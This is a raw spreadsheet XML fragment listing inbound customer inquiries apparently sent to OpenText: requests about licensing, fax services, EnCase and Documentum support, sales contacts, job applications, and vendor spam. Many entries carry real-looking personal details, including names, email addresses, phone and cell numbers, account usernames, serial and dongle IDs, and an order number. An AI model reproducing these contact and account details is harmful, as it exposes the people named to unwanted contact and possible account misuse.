I am helping my clients to do renewals for opentext .  Can i have a sales rep that i can liaise with urgently. ? </t>
  </si>
  <si>
    <t>Please let me know the procedure for applying certification</t>
  </si>
  <si>
    <t xml:space="preserve">Username : 9312843000002 _x000D_
Company : Hudson Marketing_x000D_
Is it possible that we get password for this account?_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">I need help setting up fax service with your company. AXA has informed me that you are an approved provider but I have no idea how to get information or enroll._x000D_
_x000D_
I currently have cloud fax services with ring central and I would like to keep the same fax number that I already have with them. Is this possible?_x000D_
_x000D_
You can give me a call at my office number. </t>
  </si>
  <si>
    <t>Potential sponsorship opportunity</t>
  </si>
  <si>
    <t xml:space="preserve">eDiscovery für Fieldfidher Deutschland . Einsatz für die Bereiche Risk Advisory und Kartellrecht </t>
  </si>
  <si>
    <t>Hi, _x000D_
_x000D_
Hope you are the right person to discuss about our updated database of Key IT/Technology decision makers?  _x000D_
_x000D_
Business titles include- _x000D_
_x000D_
CTO's, CIO's, Chief Architect, VP/Director/SVP/Application Development, Solutions Architect, Infrastructure Managers, Data Center Owners/Manager/Directors, Systems Software Manager, Developer, Manager Information Services, Network and Communications Managers, Data Center and Cloud architects, Information Technology Project Manager, Network Manager, VP/Director of IT, IT Manager, Product Management,National co-op leaders, Co-op insiders, Engineering, BI Analysts, BI Architects, Data Analysts and all other key decision makers in the industry who might be looking for- _x000D_
_x000D_
Consultants ,Distributors, Manufacturers, Software Providers, Service Providers whose area of business is Wire, cables, transformers, SCADA, GIS, demand side management, power quality, utility vehicles, construction equipment, telecommunications, Electronics,Information Technology, Communication Technology etc_x000D_
_x000D_
Kindly let me know your target criteria so that we can provide you exact counts associated with you criteria: _x000D_
_x000D_
Target Industry:_x000D_
Target Job title:_x000D_
Target Geography: _x000D_
_x000D_
Regards,_x000D_
Bruce Martin</t>
  </si>
  <si>
    <t>I have a customer asking if xPression is being phased out. They are saying Open Text has an end of life of December 2019, and are wondering if that is just for their support. I do not have a lot of information other than that, and I have not dealt with OpenText before. Looking for some assistance. Thanks!</t>
  </si>
  <si>
    <t>I designed a template of 9 pages in using Teleform 16.2 version. After activated the form and test-run it, the pages were scanned separately. It came as 9 separate templates with missing page status. I did page linked during the design stage but it seems as if that does not work. My organization has license for this product. The serial # of our product is 1000025091. Contact email on your account is susanna.town@ucalgary.ca, she is my line Manager.</t>
  </si>
  <si>
    <t>Can I get your API documentation?  We are an existing client looking to integrate into our business solution._x000D_
_x000D_
&gt; Leverage a full suite of SOAP-based XML APIs for easy integration into virtually any application requiring customization or automation</t>
  </si>
  <si>
    <t>I am interested in learning about your product, pricing and capabilities._x000D_
Thanks</t>
  </si>
  <si>
    <t>I work for Sharp and would like to more about your integration with our MFPs.</t>
  </si>
  <si>
    <t>Looking for work</t>
  </si>
  <si>
    <t>Interested in information regarding licensing cost and options for OpenText Desktop Viewer product. Coworkers currently using Imagenation software for image / pdf editing, seems like Desktop Viewer is the newer replacement.</t>
  </si>
  <si>
    <t>We use ApplicationXtender from OpenText in our organization.  However, our support for the software is resold through Jack Henry and Associates (Symitar).  I'd like to understand if we can purchase support directly through OpenText.  Please reach out to me at your convenience.</t>
  </si>
  <si>
    <t xml:space="preserve">Is it possible that we can have sender' receipt when using Easylink Fax (sending fax to 1xxxxxxxxxx@faxmail.com)? I enabled delivery receipt and read receipt in Outlook but didn't receive any one of them. </t>
  </si>
  <si>
    <t xml:space="preserve">Hi there, _x000D_
I'd like a demo of your platform to manage assets generated by an internal communications team. I will be taking note of the following criteria: folder organization, search engine, sharing, workflow management for versioning/approvals, integration with our current workflow tool, KiSSFLOW, Adobe integration, ability to make global content changes, ability to edit assets within the tool, ease of working with the vendor, ease of implementation and budget._x000D_
Thanks! </t>
  </si>
  <si>
    <t xml:space="preserve">Need to know who is our OpenText Decisiv account executive is.  </t>
  </si>
  <si>
    <t>FAX Software</t>
  </si>
  <si>
    <t>We need to start testing EDI setup for Stage. I am not sure if we have a Support Contract for this. If we need Support for the testing, then please send us the necessary documents._x000D_
Thank you.</t>
  </si>
  <si>
    <t xml:space="preserve">Digital Asset Management </t>
  </si>
  <si>
    <t>eDocs.  We essentially are looking for a means to easily scan a variety of physical documents and then sort the PDF's on our system and then make everything within the document searchable through something like OCR.  Further down the line we want to go full paperless including managing, editing, archiving and saving documents like excel sheets, PDF's, images, etc.</t>
  </si>
  <si>
    <t>we cannot download the virtual fax machine with a new windows 10 computer.</t>
  </si>
  <si>
    <t>IQ</t>
  </si>
  <si>
    <t>aaa 可口可乐 aaa</t>
  </si>
  <si>
    <t>Your UNSUBSCRIBE link is not working in your emails.</t>
  </si>
  <si>
    <t xml:space="preserve">Hello._x000D_
I am a member of the Product Selection &amp; Sustainment group at Lockheed Martin RMS.  Our charter is to provide market surveillance and product obsolescence information to Lockheed Martin programs so that they may understand the product availability and supportability of their systems._x000D_
Are the products below:_x000D_
	Currently available?_x000D_
	Currently supported?_x000D_
ID	VENDOR	OEM_PN	DESCRIPTION_x000D_
100062	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 8.0	Autonomy Virage MediaBin 8.0_x000D_
100063	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 7.5.1	Autonomy Virage VideoLogger_x000D_
100082	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 4.5	MediaBin Enterprise Manager_x000D_
100083	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 4.6	MediaBin HotFolder Editor_x000D_
100084	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 8.3.0	MediaBin Server_x000D_
100086	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 3.0.5305.0	Microsoft WSE 3.0 Runtime_x000D_
100087	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 4.13.9783	OpenOffice 4.1.3_x000D_
100089	HPE DBA Hewlett Packard Enterprise Company (Software)	HP Mediabin 7.0.0000	Virage SmartEncode Service_x000D_
_x000D_
If applicable, are there  newer software versions?_x000D_
	What is the current naming convention of the new software?_x000D_
	What was the release date of the newer software version?_x000D_
	How long is the newer software expected to be supported?_x000D_
Thank you very much._x000D_
Have a great day._x000D_
Kevin_x000D_
v/r_x000D_
Kevin P. Larrabee_x000D_
Lockheed Martin Rotary / Mission Systems _x000D_
kevin.p.larrabee@lmco.com_x000D_
Cell (619) 384-7757_x000D_
Desk (858) 267-5341_x000D_
 _x000D_
 _x000D_
</t>
  </si>
  <si>
    <t>For a fresher job</t>
  </si>
  <si>
    <t xml:space="preserve">Referral for safe and secure business uploads._x000D_
To provide a bit of context, the main use for this would be to have candidates upload sensitive onboarding information temporarily until our HR department has extracted the information (files will be removed afterwards)._x000D_
We are looking for ease of use, but of course, security.  We usually have anywhere between 10-30 individuals who require file uploading within the same time period.  The files to be uploaded will be anywhere between 1-3 images per candidate so this should not take up too much space._x000D_
Please advise on the best option to undertake and the pricing structure around that._x000D_
_x000D_
Regards,_x000D_
_x000D_
Larry Au_x000D_
(HR Account Administrator, SDI Marketing)_x000D_
</t>
  </si>
  <si>
    <t>Hi,_x000D_
I have been trying to get a quote for Encase Mobile since last month without any response from OT. Our sales contact, Juan Vargas, seem not be with OT now._x000D_
could you provide me with a new contact in order to talk with him/she?_x000D_
_x000D_
Regards,</t>
  </si>
  <si>
    <t xml:space="preserve">Need to buy Hummingbird Exceed Server Edition. </t>
  </si>
  <si>
    <t>Sourcing training in Documentum. We're need an urgent contact. Thanks in advance</t>
  </si>
  <si>
    <t>Hello I am a Systems Engineer at Womble Bond Dickinson, I wanted to confirm the hash for the downloaded exe that we are going to use: e2605a7398167ba1e8116a907034a5a9</t>
  </si>
  <si>
    <t xml:space="preserve">Hello!_x000D_
 _x000D_
This is Suleyman from IOXI. We are a boutique localization and translation agency based in Istanbul, Turkey._x000D_
The fields in which we translate and localize cover a broad range of contents; including games, mobile apps, movies, books, business and we translate from all languages into Turkish._x000D_
_x000D_
Please let me know if you need a Turkish partner for your translation needs. We are very much willing to collaborate and create shared value in this field. Looking forward to hearing back from you._x000D_
Have a great day!_x000D_
Yours Sincerely,_x000D_
___________________________x000D_
Süleyman Başkan_x000D_
IOXI Localizations_x000D_
Phone : +90 538 570 6666_x000D_
</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We are migrating to Windows 10 and looks like OpenText Tiff converter is not compatible. How can we solve this issue?</t>
  </si>
  <si>
    <t>indeed of job</t>
  </si>
  <si>
    <t>Gostaria de obter mais informações sobre instalação em servidor Linux e preços. Obrigado.</t>
  </si>
  <si>
    <t>We are looking fax solution for our customer. We have provided some RightFax solutions to customers earlier but we do not have current pricing information available. We have open customer case which would requite 4 simultaneous fax sessions, forwarding received faxes to a single fax box and sending fax using outlook and HP MFP devices.</t>
  </si>
  <si>
    <t xml:space="preserve">Good Morning, I am having issues logging on to the support portal. I have an individual account kimberley.chrona@cse-cst.gc.ca and we have a group account ipc@cse-cst.gc.ca and both of those accounts no longer work. Did they expire or did something change to the support page. ? </t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
We want to take a part in the tender for:_x000D_
_x000D_
Grupa Azoty Zakłady Azotowe Kędzierzyn S.A. _x000D_
ul. Mostowa 30A _x000D_
skr. poczt. 163 _x000D_
47-220 Kędzierzyn-Koźle_x000D_
_x000D_
Customer wants to buy:_x000D_
_x000D_
1.  License 20000 x Vendor Invoice Management for SAP Solutions Invoices Per Year + support for 1 year from the date of purchase P/N:  S-OPTVIMVOL _x000D_
2. License 20000  x  Invoice  Capture  Center  for  SAP  Solutions  Invoices  Per  Year  +  support for 1 year from the date of purchase  P/NL: S-DTICCSAP_x000D_
_x000D_
Can i ask for an offer for resale?_x000D_
_x000D_
Best regards,_x000D_
Ronald</t>
  </si>
  <si>
    <t>Dear Sir / Madam,_x000D_
_x000D_
My name is Ward Broeren and I am the process manager of Jobe Sports International._x000D_
I would like to get in contact with GSX to build an EDI connection with GSX to receive orders from Decathlon._x000D_
_x000D_
I am currently in contact met Thierry Bailleux and Julien Presty and they have informed me about this emailaddress to get in contact with GSX._x000D_
_x000D_
Would you please get me in contact with the right person to discuss the next steps to make the connection?_x000D_
_x000D_
Thanks and regards,_x000D_
Ward Broeren</t>
  </si>
  <si>
    <t xml:space="preserve">Sehr geehrte Damen und Herren,_x000D_
_x000D_
wir sind auf der Suche nach einer geeigneten (SAP-) Archivlösung für einen unserer Partner._x000D_
Wir möchten uns als erstes einen groben Überblick in Bezug auf Leistungen und das dazugehörie Preis- und Lizenzmodell verschaffen._x000D_
Aktuell sind die Anforderungen nur "high level" definiert:_x000D_
1. Das Archivsystem muss an SAP angebunden werden_x000D_
2. Es werden ca. 10 non-SAP User zusätzlich für den (externen) Zugriff benötigt._x000D_
_x000D_
Könnten Sie mir bitte Ihr Leistungs-, Preis- und Lizenzmodell zukommen lassen, sodass wir dem Kunden einen entsprechende "High-Level Übersicht" geben können._x000D_
_x000D_
Vielen Dank im Voraus für Ihre Hilfe!_x000D_
_x000D_
MIt freundlichen Grüßen_x000D_
Dominik Bartholmé_x000D_
aplicado GmbH_x000D_
</t>
  </si>
  <si>
    <t>I need to work sale supervisor</t>
  </si>
  <si>
    <t>Hi Good Day,_x000D_
Is the license for Teleform 10.8 perpetual or is there a yearly subscription?_x000D_
Kind Regards,</t>
  </si>
  <si>
    <t>Hi,_x000D_
_x000D_
We require Trail management software on urgent basis needed for customer CAA Pakista._x000D_
details are as under:-_x000D_
_x000D_
"The Solution shall support analysis and reporting function as the system administrator, as the operator, or as the auditor level, such as system errors, operation reports and access history"_x000D_
Instances/Licenses:    19_x000D_
Support:                       04 Years_x000D_
_x000D_
regards,_x000D_
Muhammad Salman</t>
  </si>
  <si>
    <t>We are having an initiative to upgrade our platform and exploring different solution providers across the world to see any opportunities to join up. Would please share the contact person at your end so that we can further discuss in detail and share the RFI? Thanks</t>
  </si>
  <si>
    <t>i register account on your website and confirm account registration (from received e-mail). I have "dongle" (not electronic licence). After installing Encase 8.05 i try to register product. After signing in i received information that i have no access My Support. I cannot register product (and probably receive product updates in a future). I request access to the MY Support. What should I do to register my product and get access to MY Support?</t>
  </si>
  <si>
    <t>Need help with B2B Integration</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
Hope you are doing well._x000D_
I am Max Williams (Jitesh Chauhan), Marketing manager with one of the fastest growing Digital Marketing Company based in India. If you ever wonder why is your website not ranking high or generating higher traffic &amp; revenue than your competitors then here are the following reasons:_x000D_
_x000D_
1. Less user friendly content structure._x000D_
2. Website on-page issues._x000D_
3. Lack of quality content optimization_x000D_
4. Not targeting the keywords properly on the page._x000D_
5. Low quality links and lack do-follow links to the site._x000D_
_x000D_
Your loss is your competitor’s gain i.e. the traffic which could have generated quality sales for you goes to your competitors as they rank well in the Search Engine Result Pages (SERPs) organically. _x000D_
To brief you about the company: We do SEO, SMO and reputation management for our clients. Our team of dedicated Google Analytic and Adwords certified professionals excel in promoting and increasing the visibility of a website in various search engines which will directly help in increasing traffic to your website._x000D_
This email just tells you the fraction of things we do, our optimization process involves many other technical factors which can be sent to you on your request. Simply revert back to this email with your name and the best number to catch you on, and we can have quick 3 minute chat to see if we can help you grow traffic, leads and sales._x000D_
 _x000D_
Best Regards,_x000D_
Max Williams_x000D_
</t>
  </si>
  <si>
    <t>need trial version of Opentext StreamServe and installation documents</t>
  </si>
  <si>
    <t xml:space="preserve">Hallo,_x000D_
I was absent for 5 years. Now I´m back in the FSAG. In the past and now I was responsible for the Operation and the Support of the OpenText system here. I had an acoount to Login at your sites. I tried to Login today and got an error Messages, that I didn´t confirm your email. Because I have work on your site in the past, that can´t be right._x000D_
My old email was thomas.zaremba@vwfs.com and I have tried to Login with this old email address. But now I have a new email address extern.thomas.zaremba@vwfs.com._x000D_
Could you solve this Problem or is it better to Register new with the new email address?_x000D_
_x000D_
With Kind regards_x000D_
Thomas Zaremba_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Перезвоните мне пожалуйста 8 (495) 646-70-38 Виктор</t>
  </si>
  <si>
    <t>Existing user of Captaris Alchemy release 8.2 (Build 200.303) _x000D_
Would like to enquire for the purchase of additional user licences.</t>
  </si>
  <si>
    <t>No Password Change possible: "An error occured updating password"._x000D_
I have tried different Passwords._x000D_
At the moment i am in training in munich and a recall is not possible. Please contact me via mail.</t>
  </si>
  <si>
    <t xml:space="preserve">Dear All_x000D_
I hope this email finds you well._x000D_
_x000D_
Let me have a brief introduction of our company. It is over 20 years that Eurodesign has been delivering high-end telecom solutions to a large number of business in Azerbaijan and Georgia. Eurodesign specializes in IT service delivery, system integration, IT consultancy and project management. Applying vast experience and technical expertise, Eurodesign is able to offer broad range of IT and Telecom services and products. _x000D_
_x000D_
We are interested in a partnership with your company due to reason that we have large project in Irag you would be interested in. We would be very grateful for your support in this project and please advice if you could provide the contacts person who can assist on the accreditation and sales process. We look forward to speaking with you soon to talk about potential project and services that can allow us to form a productive and enjoyable cooperative team. _x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We have existing opentext document control platform without any support, just want to know how to improve existing platform and how to get a support?</t>
  </si>
  <si>
    <t>i need documents on opentext streamserve \ CCE</t>
  </si>
  <si>
    <t>Win</t>
  </si>
  <si>
    <t>Applying for System Administrator</t>
  </si>
  <si>
    <t>Applying for the System Admin position or any IT related job openings.</t>
  </si>
  <si>
    <t>Good day!_x000D_
I heard about your company through a family friend of ours, they said that you are hiring fresh graduates, I was hoping to apply in your company as a Quality Assurance or IT associate position.</t>
  </si>
  <si>
    <t xml:space="preserve">proactively manage </t>
  </si>
  <si>
    <t>I am trying to download the updated version of Encase but I have no access even after I've confirmed my email address for the support for many times. We used to download from Guidance site before but now with new site, we couldn't. The dongle ID is V1050494285 and Order Number is 113980. Please let me know if you need any more information to resolve this. Thank you in advance.</t>
  </si>
  <si>
    <t>I am tracking down a charge to my credit card in February 2018 by Xpedite, which brought me to this website.  Xpedite serviced "fax2mail" subscription I once had, but want to be sure is now cancelled.  I don't want another charge to my account.  Please verify my assumptions are correct and that I will not be charged again._x000D_
_x000D_
Thanks!</t>
  </si>
  <si>
    <t>Hi, I need a license of Gupta Reports 6.1 to edit documents in an ERP that we current use.</t>
  </si>
  <si>
    <t xml:space="preserve">hello,  Would like to request a document be reloaded to our VAN mail box for re-delivery.  _x000D_
Message Reference #: M--0668922,  ICN 600000053,  document was an 820.  Sender Qual/ID: 12/14147844480   Receiver Qual/ID: 12/6053434217 _x000D_
my cell # is 605-431-6464    Please feel free to call me .. or any response .. would like to get this file back. </t>
  </si>
  <si>
    <t xml:space="preserve">Do you want to become more popular on Instagram? I’d love to help. _x000D_
_x000D_
Michael_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">Looking for an ECM solution for manufacturing with MS Dynamics Nav integration  </t>
  </si>
  <si>
    <t xml:space="preserve">I'm not able to create an account for a former employee who has been rehired. I receive the error message "account already exist" when I attempt to add tsoto@capitalidea.org. Her account was deactivated when she left the organization about 2 years ago. Her name is Theresa Soto and her fax number was 512.828.6126 Is it possible to reactive her account with the same fax number that she had before? _x000D_
_x000D_
Marvin_x000D_
_x000D_
</t>
  </si>
  <si>
    <t>We currently use FC but need resources to further support our district as our Tech Department has had significant changes in staffing. There is a push from within the district to move to a new email system. Any support that our department gets will allow us to keep FC and serve our staff better. Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">would like to enroll someone in 4-8206 Captiva 7.6 Designer  $2685  &amp; 3-8201 Captiva 7.6 Fundamentals and Administration $4,475  </t>
  </si>
  <si>
    <t>New account administrator. _x000D_
_x000D_
Lynda Clayton is no longer with the company and request a username change to administer the users/fax numbers.</t>
  </si>
  <si>
    <t>URGENT: Expiration of our TLS certificates used for HTTPS communication</t>
  </si>
  <si>
    <t>Hello,_x000D_
_x000D_
My name is Grace and I'm an associate here at Stretch Pro located in Old Town Pasadena._x000D_
_x000D_
Stretch Pro is the premier health and wellness studio specializing in _x000D_
Stretch Therapy for active, injured, and everyday people looking to boost their daily performance. _x000D_
_x000D_
As fitness enthusiasts, we understand the importance of recovery, and we would like to offer you a complimentary 25 minute stretch session along with a recovery boots session. We often do complimentary events, and we would love to coordinate a collaboration with you and your staff. If that is something you are interested in please reach out to us with any ideas, inquiries, or questions you have. We look forward to hearing you!</t>
  </si>
  <si>
    <t>I was looking at your website to find class date for the: 2-0106 Content Server System Administration v16 course. (2 days). Your website states there are no dates at this time for this virtual course. When do you expect the dates to be set up?_x000D_
_x000D_
If there is a class available, do you require advance payment. We are a State of Texas government agency. We have previously done business with your company and I believe on a training previously, advance payment was not required._x000D_
_x000D_
Also, is Ardith Buckmaster our contact for OpenText? Your prompt response is appreciated._x000D_
_x000D_
Selma Moreno</t>
  </si>
  <si>
    <t>Would like to talk with sales about a HIPAA compliant cloud faxing solution and schedule a product demo.</t>
  </si>
  <si>
    <t>faxpress premier</t>
  </si>
  <si>
    <t xml:space="preserve">I am looking for a document management system for our firm, that is easy to use and will integrate smoothly with MS Office. </t>
  </si>
  <si>
    <t xml:space="preserve">Who can I talk with about having faxes from our Rightfax Connect directed to an additional destination?_x000D_
We want to re-direct to another site in our network, but would like to have sent to two (2) sites in parallel if possible during the transition._x000D_
_x000D_
Thank you!_x000D_
_x000D_
John_x000D_
</t>
  </si>
  <si>
    <t>Team,_x000D_
_x000D_
I would need to know the latest version/release for the product Archiving for Content Server and the release date. Kindly let know if there is a link for the same.</t>
  </si>
  <si>
    <t>I work for a video production company that records events and conferences. We also do live-streaming, highlight videos, and interviews as well. Would you be interested in working with us for your upcoming event?</t>
  </si>
  <si>
    <t>Interested in a demo of your DAM system and what it has to offer. Thanks</t>
  </si>
  <si>
    <t>I have sent my Encase Forensics activation request (including .WibuCmRaU file) twice, but I haven't received answer, please let me know if There is something wrong with my request. Thanks in advance.</t>
  </si>
  <si>
    <t>Market research for upcoming RFI.</t>
  </si>
  <si>
    <t>Hi there, I am interested in seeing a demonstration of your OpenText Documentum for Life Sciences product._x000D_
_x000D_
We are a SME life sciences company who are looking for a better electronic quality management / document management system. We currently have around 80 employees but are part of the larger Sharp corporation._x000D_
_x000D_
Would you be able to give us a demonstration of your system? Is your software suitable for a company of 80 people?_x000D_
_x000D_
All the best,_x000D_
_x000D_
Josh</t>
  </si>
  <si>
    <t>Hello, I will like to know pricing and features of your ECM software. I need to implement this in a company._x000D_
_x000D_
I do prefer to be contacted by email.</t>
  </si>
  <si>
    <t>I want to buy Unified report builder 6.2</t>
  </si>
  <si>
    <t>We would like to get the product eDOCs por our Law Team in our Enterprise._x000D_
_x000D_
How much cost this per user?</t>
  </si>
  <si>
    <t xml:space="preserve">I am in need of a quote that will be resold to the federal government (DHS). Can the correct POC send me an email please? Thanks! </t>
  </si>
  <si>
    <t>Did not receive confirmation email for "My Support" . I am looking support for OT Exstream Product</t>
  </si>
  <si>
    <t xml:space="preserve">Dear Team,_x000D_
_x000D_
I am currently working alongside with few of the leading experts in the industry on a project called the ‘World AI Show’ - India Edition which is scheduled to take place on the 22nd – 23rd November 2018, in Mumbai (India). Our partners include the likes of Leading Associations, Top-notch firms &amp; the biggest solution providers.  I am getting in touch with you`ll today, to understand if ‘OpenText Corp’ would like to take up an active role in being one of the prime solution providers at this high profile gathering. _x000D_
_x000D_
Please do let me know, as to whom I can take this up with. _x000D_
_x000D_
_x000D_
Kind Regards,_x000D_
_x000D_
Neeraj Naik_x000D_
+91 7022544314_x000D_
</t>
  </si>
  <si>
    <t>Hello,  we are currently using Encase Enterprise edition and have been for a few years. We would like to scale this product down to just a stand alone workstation version. Could someone please contact me via email or phone and let me know what all we need to do to make this happen? And how much the cost would be?_x000D_
thank you_x000D_
Mark Gosswiller_x000D_
208-332-3570  ext 3777</t>
  </si>
  <si>
    <t xml:space="preserve">Inquiry regarding legal solutions for file sharing and HIPAA compliance. </t>
  </si>
  <si>
    <t>I need access to ECM (Documentum) set of products but I don't have the End user ID and last number that you require._x000D_
Thank you in advance!_x000D_
Best regards,_x000D_
Vladimir</t>
  </si>
  <si>
    <t>Hi_x000D_
We have a client who are using OpenText Fax2Mail, and was wondering if you had a Xerox EIP connector for that solution? I see you have an OpenText Rightfax connector, but haven't found anything for Fax2Mail._x000D_
Thanks in advance_x000D_
Regards,_x000D_
Jean-Marie</t>
  </si>
  <si>
    <t>No matter what new password I type in I always get "Update password failed".  What do I need to do differently?  Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I need assistance finding the product that is right for my team. Initial requirements are that we want to store information for each client on a separate page, but be able to search the contents of all pages from a search bar. I was hoping to speak to someone who could point me in the right direction. </t>
  </si>
  <si>
    <t>Newest version EnCase software download and cert file download</t>
  </si>
  <si>
    <t>I would like to know the price of the license of OpenText HostExplorer v15.</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings, _x000D_
_x000D_
Tried to reach you Dubai office but no response. Please advise your distributor for Documentum since we need to upgrade. </t>
  </si>
  <si>
    <t xml:space="preserve">HI,_x000D_
Created new account in Opentext. However, Not able to access the Support section._x000D_
_x000D_
Please help in assigning required access._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>Sales Order Automation</t>
  </si>
  <si>
    <t>HI,_x000D_
_x000D_
Quick question, can Opten text be hosted on a Google Cloud Control Engin VM?_x000D_
_x000D_
Thanks</t>
  </si>
  <si>
    <t xml:space="preserve">I wanted to discuss the Information governance and risk management policy </t>
  </si>
  <si>
    <t>I can't reset my password. I receive the reset link, I enter the new password, but I receive the error "Update password failed ". I can't create a new account with my email address, because there is already an associated account.</t>
  </si>
  <si>
    <t>Please provide details of forensic tools (specs and pricing)</t>
  </si>
  <si>
    <t>Hello,_x000D_
We're potentially interested in your electronic document management but wondered whether you had an established/accredited Quality Management System (eg ISO 9001 or equivalent)._x000D_
Kind regards_x000D_
Adam Williams</t>
  </si>
  <si>
    <t>Our address needs to be amended on the system.</t>
  </si>
  <si>
    <t xml:space="preserve">xpression-enterprise-edition:_x000D_
We are looking for a saas-tool to convert indd-templates populated with custom XML data to PDF-files based on a pay-per-use license._x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">We are security consultants preparing security architecture concepts for customers that use OpenText products. We prepare for a deep dive session to discuss and create a security concept of a solution based on OTDS, PS, CS, AS, Centera, Corporate IdP. Architecture documents and administrator manuals would be helpful to understand the general technical architecture of OT products. We found this "opentext-wp-process-suite-platform-architecture.pdf" and look for similar documents for CS, AS, OTDS as well as administrator manuals describing integration in a more technical/configuration based manner. _x000D_
_x000D_
Best regards _x000D_
Michael Sax </t>
  </si>
  <si>
    <t>Консультация по сотрудничеству</t>
  </si>
  <si>
    <t xml:space="preserve">*Please note the revised phone number*  +612 9904 1722   (there was a wrong digit in my previous email)_x000D_
We are being bombarded (day and night) with fax calls (even though we do not have a fax) – the calls are going to our main business line in Australia (+612 9904 1722). PLEASE can you STOP these calls immediately. It is driving us insane!  _x000D_
We are on the verge of reporting this to the relevant agencies. But trust you can help us._x000D_
</t>
  </si>
  <si>
    <t>I need to be connected to the ING Captiva customer, currently I have no access to our tickets or resources.</t>
  </si>
  <si>
    <t xml:space="preserve">We are being bombarded (day and night) with fax calls (even though we do not have a fax) – the calls are going to our main business line in Australia (+612 990241722). PLEASE can you STOP these calls immediately. It is driving us insane!  _x000D_
We are on the verge of reporting this to the relevant agencies. But trust you can help us._x000D_
</t>
  </si>
  <si>
    <t>Good Day!_x000D_
_x000D_
I would like to seek your kind assistance on how to reach your Human Resources Department for employment verification._x000D_
_x000D_
Your response is highly appreciated.</t>
  </si>
  <si>
    <t>Could we try your  OpenText NFS Client v4 for Windows? Thanks</t>
  </si>
  <si>
    <t>Hello,_x000D_
where is the EnCase Forensic Download Site?_x000D_
Where can I see the Custom Portal and User Forum?</t>
  </si>
  <si>
    <t>Здравствуйте, могу продвинуть ваш сайт, вывиду в топ 10 гугл и яндекс, за 6 месяцев. _x000D_
Если Вас заинтересовало,отпишитесь!</t>
  </si>
  <si>
    <t>Just after a pricing model for Capture Centre</t>
  </si>
  <si>
    <t>Hi,_x000D_
I wanted to know when will the postings for 2019 Summer Co-op/Internship in Software Development be available? _x000D_
Thank you,_x000D_
Dhruv Bhavsar</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,_x000D_
I try to access MySupport portal but i unable to access. Can I know why?_x000D_
I already verified my email.  </t>
  </si>
  <si>
    <t>Не могу дозвониться до вашего офиса</t>
  </si>
  <si>
    <t>Looking for training course on streamserve output management for document design from our Infor M3 ERP.</t>
  </si>
  <si>
    <t>aaa快乐是大家的aaa</t>
  </si>
  <si>
    <t>Looking for a RightFax hybrid solution for our hospital to be used as a backup in case of a phone system outage.</t>
  </si>
  <si>
    <t>I am interested in your media management system: in particular, ballpark pricing and whether it is possible to trial the software._x000D_
_x000D_
Thanks,_x000D_
Andrew</t>
  </si>
  <si>
    <t xml:space="preserve">More information on the Webinar planned for Nov. 29th - are there more details that you can share? </t>
  </si>
  <si>
    <t>Looking for a quote for 150 call recording sessions.</t>
  </si>
  <si>
    <t>We want to port two more phone numbers over to you.  I need to talk to our rep about this.</t>
  </si>
  <si>
    <t xml:space="preserve">If you are the correct location to ask for help, can you please advise me on my below question.  Thank You.  _x000D_
I have a Macbook Pro and have been using my FirstClass e mail on it for years.  Last evening I did an update to the newest operating system on the Virtual Town Hall mail for work and now I can not access it on my Mac.  I can get in on my Android, but need to have access through my laptop.  The version I have on my computer is 10.014.  I believe I have to update, but have had issues with Malware.  Is there a best link to update my Mac and the FirstClass program I have on my Mac. </t>
  </si>
  <si>
    <t>Users having error when attempting to send a fax._x000D_
Error: Problem Converting Fax Body or  Cover sheet. 2 users are currently experiencing this issue. We have a support contract but unsure of where to put that info. _x000D_
"Fax Server, RightFax Business Edition X Maintenance"_x000D_
"RF PDF Module Maintenance"</t>
  </si>
  <si>
    <t>Would like demo of ECM solution.</t>
  </si>
  <si>
    <t>Would like to get enrolled in the Webinars conducted by OT on product roadmap, new offerings. Please let me know the procedure.</t>
  </si>
  <si>
    <t>Could you please send me a receipt that I paid my EnCE renewal?  _x000D_
I had paid it, now I am trying to find a copy and can't_x000D_
Thank you,_x000D_
-Robert</t>
  </si>
  <si>
    <t>request quote for updating the licenses we own</t>
  </si>
  <si>
    <t>We are looking for a solution to streamline the vendor invoice payment process which includes receipt and scanning of vendor invoices, workflow triggering for invoice approvals, posting of invoices in SAP, learning of OCR.</t>
  </si>
  <si>
    <t>Hi,_x000D_
I wanted to inquire if you're now supporting anything higher than macOS 10.11.6.  We have some xPresso licenses._x000D_
_x000D_
Thanks,_x000D_
_x000D_
Eric</t>
  </si>
  <si>
    <t xml:space="preserve">Good morning, _x000D_
_x000D_
I am assisting the City of Indianapolis/Marion County’s Office of Corporation Counsel with the potential implementation of a legal case management solution.  The needs of the organization, at this point, are likely basic compared to most law firms.  At a high level, the organization is looking for a solution that can manage documents, manage a case's calendar, preserve emails pertaining to a case (via integration with Microsoft Outlook), manage cases to adhere to retention requirements, control permissions to cases, and be accessible to attorneys off-premise.  I am requesting a demonstration of your product.  Please contact me at your earliest convenience. _x000D_
_x000D_
Thank you,_x000D_
_x000D_
Ryne Click_x000D_
</t>
  </si>
  <si>
    <t>I would like a contact to discuss implementation of an OpenText content server, document access, invoicing, and database on Azure Cloud.</t>
  </si>
  <si>
    <t>Looking for a quote for Redact It Enterprise.</t>
  </si>
  <si>
    <t xml:space="preserve">We current are using Teleforms and are looking to replace the product.  We want to discuss other solutions and Liquid Office.  Our objectives is to provide a secure and easy method to capture employee exam data from sites around North America and have the data added to our DB.  </t>
  </si>
  <si>
